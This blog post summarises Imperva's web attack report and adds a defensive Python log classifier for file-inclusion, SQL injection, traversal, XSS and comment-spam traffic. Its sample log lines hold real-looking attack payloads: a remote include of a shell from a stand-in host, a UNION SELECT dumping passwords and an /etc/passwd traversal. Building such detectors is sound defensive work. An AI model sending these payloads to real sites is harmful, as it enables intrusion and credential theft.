Imperva does it right
I've always been irritated by those vague citations to analyst reports that you see in sales and marketing presentations. Things like "This market is projected to grow by 1,000,000 percent by 2015 (Forrester)."
I always assume that this really means "This market is projected to grow by 1,000,000 percent by 2015 (but we know you really won't check this outlandish claim)." That's why I was so pleased to see that the most recent version of "Imperva's Web Application Attack Report" (PDF) actually includes references for the analyst estimates it cites.
There are plenty of other reasons to read this report aside from the fact that Imperva did a good job with their references. It has a lot of interesting data about how the hacker threat is continuing to evolve. Here's how they summarize what's contained in the report:
- Hackers continue to increase the scale of their attacks: In our last report, we explained that websites are probed about once every two minutes, or 27 times per hour. Over the past six months, the number of probes has dropped to 18. Though a drop, this change does not mean hackers are any less persistent. In fact, when applications are attacked, hacker firepower actually saw a 30% increase. In July, we reported that applications experience about 25,000 attacks per hour. In the last six months, this has increased to nearly 38,000 attacks – or ten per second.
- Hackers exploit five common application vulnerabilities: We have identified and investigated malicious traffic containing the following technical attacks: Remote File Inclusion (RFI), SQL Injection (SQLi), Local File Inclusion (LFI), Cross Site Scripting (XSS) and Directory Traversal (DT). Cross Site Scripting and Directory Traversal are the most prevalent classical attack types.
- Hackers are relying on business logic attacks due to their ability to evade detection: We also investigated two types of Business Logic attacks: Email Extraction and Comment Spamming (EmExt and ComSpm, respectively, in following Figures and Tables). Comment Spamming injects malicious links into comment fields to defraud consumers and alter search engine results. Email Extraction simply catalogs email addresses for building spam lists. These Business Logic attacks accounted for 14% of the analyzed malicious traffic. Email Extraction traffic was more prevalent than Comment Spamming. A full anatomy of BLAs is described in this report.
- The geographic origin of Business Logic attacks was:
  - Email extraction was dominated by hosts based in African countries.
  - An unusual portion of the Comment-spamming activity was observed from eastern-European countries.
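To make the five technical attack classes and the comment-spamming business-logic attack in the summary above concrete, here is an added example of my own; it is not code from the Imperva report or from this blog. It is a small Python classifier that tags access-log lines with RFI, SQLi, LFI, XSS, DT or ComSpm. Everything in it is an assumption for illustration: the sample log lines are constructed, the signatures are deliberately small (a real WAF carries far larger rulesets), the list of "include-style" parameter names, the `/comment` path check and the three-links-per-comment spam threshold are all guesses you would tune to your own application, and the POST line carries the comment body in the query string only so that one log line has something to inspect. Email extraction is left out because it is a cross-request behaviour (one client harvesting many pages) that a single-line classifier cannot see.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample traffic in Apache combined-log style (not taken from the
# Imperva report). The POST line carries the comment text in the query string
# only so that a single log line has something to inspect; real comment bodies
# would come from a WAF or application log.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2012:10:00:01 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512
203.0.113.6 - - [10/Jan/2012:10:00:02 +0000] "GET /products.php?id=1%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 200 2048
203.0.113.7 - - [10/Jan/2012:10:00:03 +0000] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.8 - - [10/Jan/2012:10:00:04 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3000
203.0.113.9 - - [10/Jan/2012:10:00:05 +0000] "GET /static/../../../windows/win.ini HTTP/1.1" 404 200
203.0.113.10 - - [10/Jan/2012:10:00:06 +0000] "POST /blog/comment?body=Buy+now+http://spam1.example+http://spam2.example+http://spam3.example HTTP/1.1" 302 0
203.0.113.11 - - [10/Jan/2012:10:00:07 +0000] "GET /about.html HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Parameter names that typically feed include()/require(); an assumption.
INCLUDE_PARAMS = r'(?:page|file|include|inc|path|template|dir)'

# Deliberately small, illustrative signatures for the five technical classes.
SIGNATURES = {
    "RFI": re.compile(r'[?&]' + INCLUDE_PARAMS + r'=(?:https?|ftp)://', re.I),
    "LFI": re.compile(r'[?&]' + INCLUDE_PARAMS + r'=(?:\.\./|/etc/|/proc/|php://)', re.I),
    "DT": re.compile(r'\.\.(?:/|\\)'),
    "SQLi": re.compile(
        r"(?:'\s*or\s+\d+\s*=\s*\d+|union\s+(?:all\s+)?select\b"
        r"|;\s*drop\s+table\b|'\s*--|\bsleep\s*\()", re.I),
    "XSS": re.compile(r'(?:<script\b|javascript:|\bon(?:error|load|mouseover)\s*=)', re.I),
}

URL_RE = re.compile(r'https?://', re.I)
COMMENT_PATH_RE = re.compile(r'/comment', re.I)
SPAM_LINK_THRESHOLD = 3  # assumption: three or more links in one comment is spam


def decode(target: str) -> str:
    """Percent-decode twice so double-encoded payloads (%252e%252e/) surface."""
    return unquote_plus(unquote_plus(target))


def classify_request(method: str, target: str) -> set:
    """Return the set of attack-class labels that fire for one request."""
    decoded = decode(target)
    labels = {name for name, sig in SIGNATURES.items() if sig.search(decoded)}
    # Traversal inside an include parameter is file inclusion, not plain DT.
    if labels & {"RFI", "LFI"}:
        labels.discard("DT")
    # Business-logic heuristic: a POST to a comment endpoint stuffed with links.
    path = decoded.split("?", 1)[0]
    if (method.upper() == "POST" and COMMENT_PATH_RE.search(path)
            and len(URL_RE.findall(decoded)) >= SPAM_LINK_THRESHOLD):
        labels.add("ComSpm")
    return labels


def scan_log(text: str) -> list:
    """Parse each log line and pair the client IP with its labels; skip junk lines."""
    out = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        out.append((m.group("ip"), classify_request(m.group("method"), m.group("target"))))
    return out


def label_counts(text: str) -> dict:
    """Count requests per class, the way the report's per-attack tables do."""
    counts = {}
    for _, labels in scan_log(text):
        for lab in labels:
            counts[lab] = counts.get(lab, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, labels in scan_log(SAMPLE_LOG):
        print(ip, sorted(labels) or ["-"])
    print(label_counts(SAMPLE_LOG))
```

Two design points worth noting. Decoding twice before matching is what catches the double-encoded traversal (`%252e%252e/`) that a single decode would miss, and it is cheap insurance against one of the most common evasion tricks. Collapsing DT into LFI or RFI when the traversal sits in an include-style parameter keeps the five classes mutually exclusive for counting, which is the only way per-class percentages like the report's are meaningful; if you would rather see every signature that fired, drop the `discard`.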